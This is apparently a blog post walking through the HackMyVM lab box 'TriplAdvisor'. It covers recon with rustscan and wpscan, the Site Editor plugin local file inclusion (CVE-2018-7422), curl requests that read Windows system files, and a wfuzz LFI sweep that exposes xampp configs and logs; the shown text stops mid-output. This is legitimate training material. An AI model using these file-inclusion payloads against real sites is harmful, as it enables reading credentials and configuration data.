{"id":830,"date":"2025-06-04T17:38:58","date_gmt":"2025-06-04T09:38:58","guid":{"rendered":"http:\/\/162.14.82.114\/?p=830"},"modified":"2025-06-04T17:38:58","modified_gmt":"2025-06-04T09:38:58","slug":"hmv-_-tripladvisor","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/830\/06\/04\/2025\/","title":{"rendered":"hmv[-_-]TriplAdvisor"},"content":{"rendered":"<h1>TriplAdvisor<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737262.png\" alt=\"image-20250604114245534\" style=\"zoom: 50%;\" \/><\/p>\n<p>The target VM here is on a host-only network; adjust this to match your own setup:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737263.png\" alt=\"image-20250604115340621\" \/><\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737265.png\" alt=\"image-20250604120117273\" style=\"zoom: 50%;\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ sudo rustscan -a $IP -- -sCV -Pn\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\nOpen 192.168.10.102:445\nOpen 192.168.10.102:5985\nOpen 192.168.10.102:8080\n\nPORT     STATE SERVICE       REASON          VERSION\n445\/tcp  open  microsoft-ds? 
syn-ack ttl 128\n5985\/tcp open  http          syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n8080\/tcp open  http          syn-ack ttl 128 Apache httpd\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-title: Did not follow redirect to http:\/\/tripladvisor:8080\/wordpress\/\n|_http-server-header: Apache\n|_http-favicon: Unknown favicon MD5: 3BD2EC61324AD4D27CB7B0F484CD4289\n|_http-open-proxy: Proxy might be redirecting requests\nMAC Address: 08:00:27:BC:3F:CE (Oracle VirtualBox virtual NIC)\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-security-mode: \n|   2:1:0: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2025-06-04T04:07:56\n|_  start_date: 2025-06-04T18:59:30\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 59001\/tcp): CLEAN (Timeout)\n|   Check 2 (port 57067\/tcp): CLEAN (Timeout)\n|   Check 3 (port 10647\/udp): CLEAN (Timeout)\n|   Check 4 (port 41420\/udp): CLEAN (Timeout)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n|_clock-skew: 3s<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<p>There is a hostname and a redirect to it, so let's take a look:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ sudo vim \/etc\/hosts             \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ cat \/etc\/hosts | grep $IP                                                               \n192.168.10.102  tripladvisor\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl -I http:\/\/tripladvisor:8080\/wordpress\/                                    \nHTTP\/1.1 200 OK\nDate: Wed, 04 Jun 2025 04:13:53 GMT\nServer: Apache\nSet-Cookie: 
PHPSESSID=npdfldo41ae5urlct2d4lb3114; path=\/; HttpOnly\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nX-Pingback: http:\/\/tripladvisor:8080\/wordpress\/xmlrpc.php\nLink: &lt;http:\/\/tripladvisor:8080\/wordpress\/wp-json\/&gt;; rel=&quot;https:\/\/api.w.org\/&quot;\nLink: &lt;http:\/\/tripladvisor:8080\/wordpress\/&gt;; rel=shortlink\nContent-Type: text\/html; charset=UTF-8\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ sudo dirsearch -u http:\/\/tripladvisor:8080\/wordpress\/ 2&gt;\/dev\/null                                                                                     \n\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/home\/kali\/temp\/TriplAdvisor\/reports\/http_tripladvisor_8080\/_wordpress__25-06-04_00-14-55.txt\n\nTarget: http:\/\/tripladvisor:8080\/\n\n[00:14:55] Starting: wordpress\/\n[00:15:18] 404 - 1016B  - \/wordpress\/%2e%2e\/\/google.com\n[00:15:18] 403 - 1004B  - \/wordpress\/%C0%AE%C0%AE%C0%AF\n[00:15:18] 403 - 1018B  - \/wordpress\/%3f\/\n[00:15:33] 403 - 1004B  - \/wordpress\/%ff\nCTRL+C detected: Pausing threads, please wait...\n^C\nTask Completed<\/code><\/pre>\n<p>Nothing found, so I'll set this aside for now; if there are no leads later, I'll scan again.<\/p>\n<h3>wpscan Scan<\/h3>\n<p>There is a blog, so let's scan it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ wpscan --url http:\/\/tripladvisor:8080\/wordpress\/ --api-token XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ 
\/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | &#039;_ \\\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.25\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[i] It seems like you have not updated the database for some time.\n[?] Do you want to update now? [Y]es [N]o, default: [N]Y\n[i] Updating the Database ...\n[i] Update completed.\n\n[+] URL: http:\/\/tripladvisor:8080\/wordpress\/ [192.168.10.102]\n[+] Started: Wed Jun  4 00:18:14 2025\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/tripladvisor:8080\/wordpress\/xmlrpc.php\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n | Confirmed By:\n |  - Link Tag (Passive Detection), 30% confidence\n |  - Direct Access (Aggressive Detection), 100% confidence\n | References:\n |  - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/tripladvisor:8080\/wordpress\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive 
Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/tripladvisor:8080\/wordpress\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n |  - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n |  - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 5.1.19 identified (Outdated, released on 2024-06-24).\n | Found By: Emoji Settings (Passive Detection)\n |  - http:\/\/tripladvisor:8080\/wordpress\/, Match: &#039;-release.min.js?ver=5.1.19&#039;\n | Confirmed By: Most Common Wp Includes Query Parameter In Homepage (Passive Detection)\n |  - http:\/\/tripladvisor:8080\/wordpress\/wp-includes\/css\/dist\/block-library\/style.min.css?ver=5.1.19\n |  - http:\/\/tripladvisor:8080\/wordpress\/wp-includes\/js\/wp-embed.min.js?ver=5.1.19\n\n[+] WordPress theme in use: expert-adventure-guide\n | Location: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/themes\/expert-adventure-guide\/\n | Last Updated: 2025-05-09T00:00:00.000Z\n | Readme: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/themes\/expert-adventure-guide\/readme.txt\n | [!] 
The version is out of date, the latest version is 2.3\n | Style URL: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/themes\/expert-adventure-guide\/style.css?ver=5.1.19\n | Style Name: Expert Adventure Guide\n | Style URI: https:\/\/www.seothemesexpert.com\/wordpress\/free-adventure-wordpress-theme\/\n | Description: Expert Adventure Guide is a specialized and user-friendly design crafted for professional adventure ...\n | Author: drakearthur\n | Author URI: https:\/\/www.seothemesexpert.com\/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n | Confirmed By: Css Style In 404 Page (Passive Detection)\n |\n | Version: 1.0 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http:\/\/tripladvisor:8080\/wordpress\/wp-content\/themes\/expert-adventure-guide\/style.css?ver=5.1.19, Match: &#039;Version: 1.0&#039;\n\n[+] Enumerating All Plugins (via Passive Methods)\n[+] Checking Plugin Versions (via Passive and Aggressive Methods)\n\n[i] Plugin(s) Identified:\n\n[+] editor\n | Location: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/\n |\n | Found By: Urls In Homepage (Passive Detection)\n | Confirmed By: Urls In 404 Page (Passive Detection)\n |\n | Version: 1.1 (100% confidence)\n | Found By: Readme - Stable Tag (Aggressive Detection)\n |  - http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/readme.txt\n | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)\n |  - http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/readme.txt\n\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:02:52 &lt;==============================================================================================================&gt; (137 \/ 137) 100.00% Time: 00:02:52\n[i] No Config Backups Found.\n\n[+] WPScan DB API OK\n | Plan: free\n | Requests Done (during the scan): 3\n | Requests Remaining: 22\n\n[+] Finished: Wed Jun  4 00:21:38 2025\n[+] Requests 
Done: 186\n[+] Cached Requests: 6\n[+] Data Sent: 56.919 KB\n[+] Data Received: 13.771 MB\n[+] Memory used: 269.586 MB\n[+] Elapsed time: 00:03:24<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Component Vulnerability Exploitation<\/h3>\n<p>Found a <code>wordpress<\/code> component; not sure whether it has a vulnerability, so let's look it up:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ searchsploit editor 1.1                                                                                        \n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                                                             |  Path\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nAmaya 11.1 - W3C Editor\/Browser &#039;defer&#039; Remote Stack Overflow                                                                                              | windows\/remote\/8321.py\nAmaya 11.1 - W3C Editor\/Browser (defer) Stack Overflow (PoC)                                                                                               | windows\/dos\/8314.php\nCMS from Scratch 1.1.3 - &#039;FCKeditor&#039; Arbitrary File Upload                                                                                                 | php\/webapps\/5691.php\nDjango CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting                                                                                          | python\/webapps\/40129.txt\nDrupal Module CKEditor &lt; 4.1WYSIWYG (Drupal 
6.x\/7.x) - Persistent Cross-Site Scripting                                                                     | php\/webapps\/25493.txt\nMaximus CMS 1.1.2 - &#039;FCKeditor&#039; Arbitrary File Upload                                                                                                      | php\/webapps\/15960.txt\noXygen XML Editor 21.1.1 - XML External Entity Injection                                                                                                   | windows\/local\/47658.txt\npragmaMx 1.12.1 - &#039;\/includes\/wysiwyg\/spaw\/editor\/plugins\/imgpopup\/img_popup.php?img_url&#039; Cross-Site Scripting                                              | php\/webapps\/37313.txt\nSimple Machines Forum (SMF) 1.1.15 - &#039;fckeditor&#039; Arbitrary File Upload                                                                                     | php\/webapps\/36410.txt\nWordPress Plugin Site Editor 1.1.1 - Local File Inclusion                                                                                                  | php\/webapps\/44340.txt\nWordPress Plugin User Role Editor &lt; 4.25 - Privilege Escalation                                                                                            | php\/webapps\/44595.rb\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results<\/code><\/pre>\n<p>Doesn't look like there's any lead here... Let's rescan with another tool and see whether something was missed:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ cmseek -u http:\/\/tripladvisor:8080\/wordpress\/\n___ _  _ ____ ____ ____ _  _\n|    |\\\/| [__  |___ |___ |_\/  by @r3dhax0r\n|___ |  | ___| |___ |___ | \\_ Version 1.1.3 K-RONA\n\n [+]  Deep 
Scan Results  [+] \n\n \u250f\u2501Target: tripladvisor:8080\n \u2503\n \u2520\u2500\u2500 CMS: WordPress\n \u2503    \u2502\n \u2503    \u2570\u2500\u2500 URL: https:\/\/wordpress.org\n \u2503\n \u2520\u2500\u2500[WordPress Deepscan]\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Readme file found: http:\/\/tripladvisor:8080\/wordpress\/\/readme.html\n \u2503    \u251c\u2500\u2500 License file: http:\/\/tripladvisor:8080\/wordpress\/\/license.txt\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Plugins Enumerated: 1\n \u2503    \u2502    \u2502\n \u2503    \u2502    \u2570\u2500\u2500 Plugin: editor\n \u2503    \u2502        \u2502\n \u2503    \u2502        \u251c\u2500\u2500 Version: 4.3\n \u2503    \u2502        \u2570\u2500\u2500 URL: http:\/\/tripladvisor:8080\/wordpress\/\/wp-content\/plugins\/editor\n \u2503    \u2502\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Themes Enumerated: 1\n \u2503    \u2502    \u2502\n \u2503    \u2502    \u2570\u2500\u2500 Theme: expert-adventure-guide\n \u2503    \u2502        \u2502\n \u2503    \u2502        \u251c\u2500\u2500 Version: 5.1.19\n \u2503    \u2502        \u2570\u2500\u2500 URL: http:\/\/tripladvisor:8080\/wordpress\/\/wp-content\/themes\/expert-adventure-guide\n \u2503    \u2502\n \u2503    \u2502\n \u2503    \u251c\u2500\u2500 Usernames harvested: 1\n \u2503    \u2502    \u2570\u2500\u2500 admin\n \u2503    \u2502\n \u2503\n \u2520\u2500\u2500 Result: \/home\/kali\/temp\/TriplAdvisor\/Result\/tripladvisor_8080_wordpress\/cms.json\n \u2503\n \u2517\u2501Scan Completed in 19.36 Seconds, using 44 Requests\n\n CMSeeK says ~ addio<\/code><\/pre>\n<p>Then, going back over what we already have, I found:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/readme.txt\n=== Site Editor - WordPress Site Builder - Theme Builder and Page Builder ===\nContributors: 
wpsiteeditor\nTags: site editor, site builder, page builder, theme builder, theme framework, design, inline editor, inline text editor, layout builder,live options, live, customizer, theme customizer, header builder, footer builder, fully customizable, design options,design editor, options framework, front end, page builder plugin, builder, responsive, front end editor, landing page, editor, drag-and-drop, shortcode, wordpress, ultra flexible, unlimited tools, elements, modules, support, seo, animation, absolute flexibility, live theme options, video backgrounds, font awesome, Optimized, fast, quick, ux, ui\nRequires at least: 4.7\nTested up to: 4.7.4\nStable tag: 1.1\nLicense: GPLv3\nLicense URI: https:\/\/www.gnu.org\/licenses\/gpl-3.0.html\n\nSiteEditor is The best solution for build your WordPress site with The best drag and drop WordPress Site, theme and Page Builder.Any theme, any page, any design.\n\n== Description ==\n\n**What is the Site Editor?**\n\nSite Editor is the most powerful Site Builder which is designed for WordPress. It&#039;s a powerful, advanced, user-friendly front end editor and you can build your website via drag and drop and full live options. 
Site Editor is also a powerful front-end platform for the developer.\n\n**OUR OFFICIAL WEBSITE &amp; GITHUB**\n\n[SiteEditor.ORG](https:\/\/www.siteeditor.org)\n\n[SiteEditor GitHub Repository](https:\/\/github.com\/SiteEditor\/editor)\n\n-----------<\/code><\/pre>\n<p>So the plugin's full name is <code>Site Editor<\/code>, which matches the entry that turned up in the earlier search; let's try to exploit it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ searchsploit Site Editor 1.1\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                                                             |  Path\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nDjango CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting                                                                                          | python\/webapps\/40129.txt\nDrupal Module CKEditor &lt; 4.1WYSIWYG (Drupal 6.x\/7.x) - Persistent Cross-Site Scripting                                                                     | php\/webapps\/25493.txt\npragmaMx 1.12.1 - &#039;\/includes\/wysiwyg\/spaw\/editor\/plugins\/imgpopup\/img_popup.php?img_url&#039; Cross-Site Scripting                                              | php\/webapps\/37313.txt\nWordPress Plugin Site Editor 1.1.1 - Local File Inclusion                                                                                                  | 
php\/webapps\/44340.txt\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ searchsploit -m php\/webapps\/44340.txt\n  Exploit: WordPress Plugin Site Editor 1.1.1 - Local File Inclusion\n      URL: https:\/\/www.exploit-db.com\/exploits\/44340\n     Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/44340.txt\n    Codes: CVE-2018-7422\n Verified: True\nFile Type: Unicode text, UTF-8 text\nCopied to: \/home\/kali\/temp\/TriplAdvisor\/44340.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ cat 44340.txt            \nProduct: Site Editor WordPress Plugin - https:\/\/wordpress.org\/plugins\/site-editor\/\nVendor: Site Editor\nTested version: 1.1.1\nCVE ID: CVE-2018-7422\n\n** CVE description **\nA Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php.\n\n** Technical details **\nIn site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP\u2019s require_once(). 
This parameter can be controlled by an attacker and is not properly sanitized.\n\nVulnerable code:\nif( isset( $_REQUEST[&#039;ajax_path&#039;] ) &amp;&amp; is_file( $_REQUEST[&#039;ajax_path&#039;] ) &amp;&amp; file_exists( $_REQUEST[&#039;ajax_path&#039;] ) ){\n    require_once $_REQUEST[&#039;ajax_path&#039;];\n}\n\nhttps:\/\/plugins.trac.wordpress.org\/browser\/site-editor\/trunk\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?rev=1640500#L5\n\nBy providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.\n\n** Proof of Concept **\nhttp:\/\/&lt;host&gt;\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/etc\/passwd\n\n** Solution **\nNo fix available yet.\n\n** Timeline **\n03\/01\/2018: author contacted through siteeditor.org&#039;s contact form; no reply\n16\/01\/2018: issue report filled on the public GitHub page with no technical details\n18\/01\/2018: author replies and said he replied to our e-mail 8 days ago (could not find the aforementioned e-mail at all); author sends us &quot;another&quot; e-mail\n19\/01\/2018: report sent; author says he will fix this issue &quot;very soon&quot;\n31\/01\/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply\n14\/02\/2018: WP Plugins team contacted; no reply\n06\/03\/2018: vendor contacted; no reply\n07\/03\/2018: vendor contacted; no reply\n15\/03\/2018: public disclosure\n\n** Credits **\nVulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).\n\n--\nBest Regards,\n\nNicolas Buzy-Debat\nOrange Cyberdefense Singapore (CERT-LEXSI) <\/code><\/pre>\n<p>Let's confirm it. Since we know this is a Windows box, we can try some relevant paths, for example:<\/p>\n
<pre><code class=\"language-bash\">\/boot.ini\n\/autoexec.bat\n\/windows\/system32\/drivers\/etc\/hosts\n\/windows\/repair\/SAM\n\/windows\/panther\/unattended.xml\n\/windows\/panther\/unattend\/unattended.xml\n\/windows\/system32\/license.rtf\n\/windows\/system32\/eula.txt<\/code><\/pre>\n<p>And the path here needs to be changed as well:<\/p>\n<pre><code class=\"language-bash\">http:\/\/&lt;host&gt;\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/etc\/passwd\nhttp:\/\/tripladvisor:8080\/wordpress\/\/wp-content\/plugins\/editor<\/code><\/pre>\n<p>After changing it, we get a result:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl -s &#039;http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/windows\/system32\/drivers\/etc\/hosts&#039; | html2text\n\nSkip_to_content\nThe best travel online guide!\n\n    * Home\n\n Search for: [Unknown INPUT type]\nCLOSE\n [TriplAdvisor]\n   1. Home  \/ \n   2. Error 404\n****** Error 404 ******\nCopyright \u00a9 2023, Adventure_Guide  |  WordPress_Theme\nTOP\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl -s &#039;http:\/\/tripladvisor:8080\/wordpress\/\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/windows\/system32\/drivers\/etc\/hosts&#039; | html2text\n# Copyright (c) 1993-2009 Microsoft Corp. # # This is a sample HOSTS file used\nby Microsoft TCP\/IP for Windows. # # This file contains the mappings of IP\naddresses to host names. Each # entry should be kept on an individual line. 
The\nIP address should # be placed in the first column followed by the corresponding\nhost name. # The IP address and the host name should be separated by at least\none # space. # # Additionally, comments (such as these) may be inserted on\nindividual # lines or following the machine name denoted by a &#039;#&#039; symbol. # #\nFor example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10\nx.acme.com # x client host # localhost name resolution is handled within DNS\nitself. # 127.0.0.1 localhost # ::1 localhost {&quot;success&quot;:true,&quot;data&quot;:{&quot;output&quot;:\n[]}}\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ curl -s &#039;http:\/\/tripladvisor:8080\/wordpress\/\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/windows\/system32\/drivers\/etc\/hosts&#039;\n# Copyright (c) 1993-2009 Microsoft Corp.\n#\n# This is a sample HOSTS file used by Microsoft TCP\/IP for Windows.\n#\n# This file contains the mappings of IP addresses to host names. Each\n# entry should be kept on an individual line. 
The IP address should\n# be placed in the first column followed by the corresponding host name.\n# The IP address and the host name should be separated by at least one\n# space.\n#\n# Additionally, comments (such as these) may be inserted on individual\n# lines or following the machine name denoted by a &#039;#&#039; symbol.\n#\n# For example:\n#\n#      102.54.94.97     rhino.acme.com          # source server\n#       38.25.63.10     x.acme.com              # x client host\n\n# localhost name resolution is handled within DNS itself.\n#       127.0.0.1       localhost\n#       ::1             localhost\n{&quot;success&quot;:true,&quot;data&quot;:{&quot;output&quot;:[]}}<\/code><\/pre>\n<p>Let's try fuzzing some common paths:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ ll \/usr\/share\/seclists\/Fuzzing\/LFI\ntotal 872\n-rw-r--r-- 1 root root 254354 Feb 16  2024 LFI-etc-files-of-all-linux-packages.txt\n-rw-r--r-- 1 root root  22883 Feb 16  2024 LFI-gracefulsecurity-linux.txt\n-rw-r--r-- 1 root root   9416 Feb 16  2024 LFI-gracefulsecurity-windows.txt\n-rw-r--r-- 1 root root  32507 Feb 16  2024 LFI-Jhaddix.txt\n-rw-r--r-- 1 root root 501947 Feb 16  2024 LFI-LFISuite-pathtotest-huge.txt\n-rw-r--r-- 1 root root  22215 Feb 16  2024 LFI-LFISuite-pathtotest.txt\n-rw-r--r-- 1 root root  31898 Feb 16  2024 LFI-linux-and-windows_by-1N3@CrowdShield.txt\n-rw-r--r-- 1 root root   2165 Feb 16  2024 OMI-Agent-Linux.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ wfuzz -c -w \/\/usr\/share\/seclists\/Fuzzing\/LFI\/LFI-gracefulsecurity-windows.txt -u &quot;http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=FUZZ&quot; --hh 72 2&gt;\/dev\/null\n********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer         
                *\n********************************************************\n\nTarget: http:\/\/tripladvisor:8080\/wordpress\/wp-content\/plugins\/editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=FUZZ\nTotal requests: 235\n\n=====================================================================\nID           Response   Lines    Word       Chars       Payload                                                                                                                     \n=====================================================================\n\n000000044:   200        7 L      13 W       129 Ch      &quot;C:\/Windows\/win.ini&quot;                                                                                                        \n000000043:   200        21 L     135 W      861 Ch      &quot;C:\/WINDOWS\/System32\/drivers\/etc\/hosts&quot;                                                                                     \n000000048:   200        939 L    15552 W    206724 Ch   &quot;C:\/xampp\/apache\/logs\/access.log&quot;                                                                                           \n000000049:   200        33746    712193 W   5744606 C   &quot;C:\/xampp\/apache\/logs\/error.log&quot;                                                                                            \n                        L                   h                                                                                                                                       \n000000164:   200        0 L      1 W        37 Ch       &quot;c:\/xampp\/phpMyAdmin\/config.inc.php&quot;                                                                                        \n000000163:   500        0 L      0 W        0 Ch        &quot;c:\/xampp\/php\/php.ini&quot;                                                                                                      \n000000165:   200        72 L     319 W      2133 Ch    
 &quot;c:\/xampp\/sendmail\/sendmail.ini&quot;                                                                                            \n000000160:   200        564 L    2563 W     21507 Ch    &quot;c:\/xampp\/apache\/conf\/httpd.conf&quot;                                                                                           \n000000154:   200        1092 L   17388 W    243793 Ch   &quot;c:\/xampp\/apache\/logs\/access.log&quot;                                                                                           \n000000155:   200        33746    712193 W   5744606 C   &quot;c:\/xampp\/apache\/logs\/error.log&quot;                                                                                            \n                        L                   h                                                                                                                                       \n000000229:   200        0 L      1 W        37 Ch       &quot;c:\/WINDOWS\/setuperr.log&quot;                                                                                                   \n000000227:   200        176 L    1036 W     14543 Ch    &quot;c:\/WINDOWS\/setupact.log&quot;                                                                                                   \n000000219:   200        79 L     585 W      3720 Ch     &quot;c:\/WINDOWS\/system32\/drivers\/etc\/lmhosts.sam&quot;                                                                               \n000000220:   200        16 L     55 W       444 Ch      &quot;c:\/WINDOWS\/system32\/drivers\/etc\/networks&quot;                                                                                  \n000000218:   200        21 L     135 W      861 Ch      &quot;c:\/WINDOWS\/system32\/drivers\/etc\/hosts&quot;                                                                                     \n000000221:   200        27 L     171 W      1395 Ch     
